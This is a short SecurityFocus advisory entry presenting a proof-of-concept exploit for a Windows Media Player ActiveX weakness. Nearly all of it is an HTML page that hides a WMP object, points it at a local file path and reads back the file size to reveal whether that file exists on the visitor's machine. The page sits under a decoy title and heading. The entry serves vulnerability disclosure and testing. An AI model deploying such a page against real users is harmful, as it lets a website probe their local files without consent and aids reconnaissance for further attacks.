Windows Media Player ActiveX Control File Enumeration Weakness

The following exploit was provided:

<html><head><title>My Mortality</title></head><body>

<H1>Look at yourself and find the mortality of your body</H1>
<object style="display:none;"
classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"
id="WindowsMediaPlayer">
<param name="autoStart" value="0">
<param name="mute" value="1">
</object>

<script>
var filePath = prompt("Enter the path of local file to check:","c:\\test.txt");
WindowsMediaPlayer.URL=filePath;
setTimeout(
function(){
ss=WindowsMediaPlayer.currentMedia.getItemInfoByAtom(19);
if (ss!="")
alert(filePath+" exist.\nThe file size is "+ss+" bytes. And you are surely vulnerable");
else
alert(filePath+" does not exist. Or you are not vulnerable");
}
,100);
</script>

</body></html>


 

Privacy Statement
Copyright 2010, SecurityFocus